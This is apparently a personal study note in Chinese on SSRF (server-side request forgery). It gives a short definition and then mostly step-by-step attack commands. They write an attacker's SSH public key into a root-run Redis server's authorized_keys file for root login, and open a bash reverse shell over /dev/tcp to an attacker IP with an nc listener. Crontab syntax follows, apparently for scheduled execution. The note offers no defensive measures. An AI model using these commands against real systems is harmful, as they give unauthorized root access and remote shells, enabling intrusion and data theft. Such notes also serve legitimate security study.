11.28 SSRF
SSRF
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞
一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制
比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等
写ssh-keygen公钥然后使用私钥登陆
以root运行redis
1、在本机生成key
root@ubuntu:~#ssh-keygen -t rsa //三个回车
root@ubuntu:/# cd /root/.ssh
2、将公钥导入key.txt文件
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
3、将公钥导入到靶机中
cat /root/.ssh/key.txt | ./redis-cli -h 192.168.10.1 -x set xxx
4、连接靶机
./redis-cli -h 192.168.10.1
5、写入
config set dir /root/.ssh
config set dbfilename authorized_keys
save
6、远程连接
ssh 192.168.10.1
ssh -i id_rsa root@192.168.10.1
反弹shell
将目标服务器终端反弹到指定位置(攻击者务器),注意反弹的shell和当前执行环境有关。如果使用apache反弹的shell,那么是www-data权限,低权限。
使用NC接收shell,bash弹shell
目标机:/bin/bash -i >& /dev/tcp/攻击机ip/端口 0>&1
攻击机:nc -lvp 端口号 》 监听
需要先开启监听
Linux中使用crontab周期性执行任务
crontab -l 查看当前用户的计划任务
crontab -e 编辑任务,添加任务
crontab -r 删除任务
任务:()
分钟 小时 天 月 星期 命令/脚本
*/1 * * * * echo “icq” >/tmp/icq.txt